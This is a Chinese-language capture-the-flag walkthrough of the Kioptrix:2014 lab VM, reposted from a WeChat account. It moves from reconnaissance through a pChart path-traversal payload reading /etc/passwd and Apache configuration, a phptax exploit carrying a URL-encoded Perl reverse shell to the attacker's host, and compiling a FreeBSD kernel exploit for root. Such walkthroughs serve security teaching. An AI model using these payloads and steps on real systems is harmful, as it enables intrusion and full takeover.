靶场历险记-Kioptrix:2014

admin
admin
admin
139701
文章
114
评论
2025年3月5日20:01:23评论5 views字数 2011阅读6分42秒阅读模式

信息收集

发现主机

sudo nmap -sn 1922/168.159.0/24
靶场历险记-Kioptrix:2014

判断靶机地址为:192.168.159.141

端口扫描

sudo nmap -sT -p- --min-rate 10000 192.168.159.141
靶场历险记-Kioptrix:2014

开放端口为:80、8080

详细信息

sudo nmap -sT -p 22,80,8080 -sV -sC -O 192.168.159.141
靶场历险记-Kioptrix:2014

80、8080端口:Apache httpd 2.2.21、mod_ssl/2.2.21、OpenSSL/0.9.8q、DAV/2、PHP/5.3.8

操作系统:FreeBSD

目录信息

dirb http://192.168.159.141/ 
靶场历险记-Kioptrix:2014

扫描目录,没有看到其他目录

查看网页源码

靶场历险记-Kioptrix:2014

发现一个URL路径:pChart2.1.3/index.php

访问web页面(80、8080)

80端口

访问该路径

靶场历险记-Kioptrix:2014

我们可以看到:Release 2.1.3

使用Expoit-DB搜索一下该版本有没有漏洞

靶场历险记-Kioptrix:2014

发现存在漏洞

8080端口

靶场历险记-Kioptrix:2014

访问8080端口页面显示Forbidden

发现漏洞

使用Expoit-DB搜索到的pChart2.1.3路径穿越漏洞Exp进行检测

下载Exp,找到playload

靶场历险记-Kioptrix:2014

开始构造playload

http://192.168.159.141/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

在URL输入playload

靶场历险记-Kioptrix:2014

我们可以看到操作系统为FreeBSD 9.0,拥有root权限的用户:root和toor。

我们前面访问8080端口失败,那先利用这个漏洞查看FreeBSD系统下Apache配置

看看文件路径靶场历险记-Kioptrix:2014

构造playload,查看配置文件

http://192.168.159.141/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

找到8080端口页面,可以看到被允许访问的user-agent:Mozilla/4.0 Mozilla4_browser靶场历险记-Kioptrix:2014

漏洞利用

访问8080端口,使用burpsuite拦截数据包,将user-agent修改

修改前

靶场历险记-Kioptrix:2014

修改后

靶场历险记-Kioptrix:2014

放行数据包,页面返回一个目录:phptax

靶场历险记-Kioptrix:2014

回显页面,如图:

靶场历险记-Kioptrix:2014

看看phptax有没有漏洞

searchsploit phptax

回显存在漏洞,第一个是msf的,我们看看后面两个

靶场历险记-Kioptrix:2014

复制EXP并进行查看

sudo searchsploit phptax -m 21665
靶场历险记-Kioptrix:2014

我们也可以在GitHub上搜索Exp,将其下载

https://github.com/NHPT/phptaxExploit
靶场历险记-Kioptrix:2014

解压zip文件

unzip phptaxExploit-main.zip
靶场历险记-Kioptrix:2014

监听4444端口

nc -lvvp 4444
靶场历险记-Kioptrix:2014

执行exp

python3 phptax_exp.py -u http://192.168.159.141:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.159.140%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
靶场历险记-Kioptrix:2014

成功getshell

提权

成功getshell后我们先看看用户信息

whoami #查看用户
uname -a #查看内核信息
sudo su #看看能不能直接提权
靶场历险记-Kioptrix:2014

我们可以看到系统为:FreeBSD 9.0

搜索一下看看有没有内核漏洞

searchsploit FreeBSD 9.0

发现存在漏洞,将exp保存到一个文件夹中靶场历险记-Kioptrix:2014

sudo searchsploit FreeBSD -m 28718 
靶场历险记-Kioptrix:2014

回到反弹的shell,看看有什么方式可以将exp传进靶机

which nc
which wget
which curl

发现靶机上没wget和curl,但是有nc,于是用nc传文件靶场历险记-Kioptrix:2014

查看有无gcc

which gcc
靶场历险记-Kioptrix:2014

在攻击机输入下面指令

nc -lp 8888 < 28718.c 
靶场历险记-Kioptrix:2014

shell中输入下面指令

nc -nv 192.168.159.141 8888 > exp.c
靶场历险记-Kioptrix:2014

编译exp

gcc -o exp exp.c
靶场历险记-Kioptrix:2014

运行exp,成功提权

./exp
靶场历险记-Kioptrix:2014

原文始发于微信公众号(泷羽Sec-Z1eaf):靶场历险记-Kioptrix:2014

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月5日20:01:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场历险记-Kioptrix:2014http://cn-sec.com/archives/3801313.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息